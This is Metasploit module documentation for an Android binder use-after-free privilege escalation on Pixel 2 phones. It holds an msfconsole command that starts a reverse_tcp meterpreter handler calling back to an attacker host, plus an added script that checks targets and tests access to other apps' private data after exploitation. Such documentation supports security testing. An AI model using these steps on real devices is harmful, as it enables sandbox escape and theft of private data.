Path: blob/master/documentation/modules/exploit/android/local/binder_uaf.md
Vulnerable Application
This exploit module currently targets a very specific build of Android on a specific set of hardware targets:
Google Pixel 2 or Pixel XL 2 phones running the September 2019 security patch level.
This exploit module would have to be retargeted for any other potentially vulnerable build or hardware target.
One complication with the Google Pixel 2 is that, while many Google phones have an unlockable bootloader that makes it easy to flash older Android releases, the latest Pixel 2 updates appear to have disabled this or broken the flashing of older firmware revisions onto the device. This may be a firmware bug or intentional, but Google themselves do not appear to have an answer for the problem. For testing, you may need a phone that was never updated to a later Android revision.
Verification Steps
Get an android meterpreter session on a Pixel 2 or Pixel XL 2 with the right kernel:
msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
Currently this only works on the Pixel 2 (and Pixel 2 XL) with the September 2019 security patch level. Validate that the kernel version looks like this:
Run the exploit:
Verify the new session can read and write private application data (in /data/data/..../)
Scenarios
This module illustrates a privesc that, when chained with other exploit vectors, could turn an unprivileged sandboxed exploit into a sandbox escape and system compromise. Note that the target application may need to match the kernel CPU type, so for instance a 64-bit Chrome would need to be targeted with a 64-bit kernel.
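The target constraints above (Pixel 2 / Pixel 2 XL at the September 2019 patch level), the post-exploitation read/write check from the verification steps, and the 64-bit kernel caveat from this section can be encoded as a small pre-flight script. The following is an added example written for this page, not part of the Metasploit module. It assumes the standard Android `getprop` keys `ro.product.device` and `ro.build.version.security_patch` (patch level formatted `YYYY-MM-DD`), and the device codenames `walleye` (Pixel 2) and `taimen` (Pixel 2 XL), none of which are stated on the page.

```shell
# Added pre-flight and post-exploitation checks for the binder_uaf module's
# documented target constraints. Not part of the module itself.
# Assumptions (not on the page): device codenames walleye = Pixel 2,
# taimen = Pixel 2 XL; security patch level reported as YYYY-MM-DD.

# Return 0 if the device codename and security patch level match the
# supported configuration (Pixel 2 / Pixel 2 XL, September 2019), else 1.
binder_uaf_target_ok() {
    device="$1"; patch="$2"
    case "$device" in
        walleye|taimen) ;;
        *) echo "unsupported device: $device"; return 1 ;;
    esac
    case "$patch" in
        2019-09-*) ;;
        *) echo "unsupported security patch level: $patch"; return 1 ;;
    esac
    echo "target matches: $device at patch level $patch"
    return 0
}

# Map the kernel machine string from `uname -m` to the payload/application
# bitness that must be used, per the Scenarios note (a 64-bit kernel needs a
# 64-bit target application such as 64-bit Chrome).
binder_uaf_payload_arch() {
    case "$1" in
        aarch64) echo "64-bit" ;;
        armv7l|armv8l) echo "32-bit" ;;
        *) echo "unknown" ;;
    esac
}

# Post-exploitation check: write a file in a directory that is normally
# private to one app (e.g. /data/data/<package>), read it back, clean up.
# Returns 0 if both the write and the read-back succeed.
binder_uaf_verify_rw() {
    dir="$1"; f="$dir/.binder_uaf_check.$$"
    if ! echo "binder_uaf" > "$f" 2>/dev/null; then
        echo "cannot write in $dir"; return 1
    fi
    content=$(cat "$f" 2>/dev/null)
    rm -f "$f"
    if [ "$content" != "binder_uaf" ]; then
        echo "cannot read back from $dir"; return 1
    fi
    echo "read/write OK in $dir"
    return 0
}

# Gather the live values over adb and run the checks (not exercised here;
# requires a connected device with USB debugging enabled).
binder_uaf_probe_adb() {
    d=$(adb shell getprop ro.product.device | tr -d '\r')
    p=$(adb shell getprop ro.build.version.security_patch | tr -d '\r')
    m=$(adb shell uname -m | tr -d '\r')
    binder_uaf_target_ok "$d" "$p" || return 1
    echo "use a $(binder_uaf_payload_arch "$m") target application"
}

# Constructed sample values standing in for a Pixel 2 at the September 2019
# patch level; a real run would call binder_uaf_probe_adb instead.
binder_uaf_target_ok walleye 2019-09-05
echo "use a $(binder_uaf_payload_arch aarch64) target application"
```

Run `binder_uaf_probe_adb` against a connected phone before setting up the handler; if it rejects the device or patch level, the module must be retargeted as described in the Vulnerable Application section rather than run as-is. After the exploit returns a session, `binder_uaf_verify_rw /data/data/<package>` from that session is the read/write check the verification steps ask for.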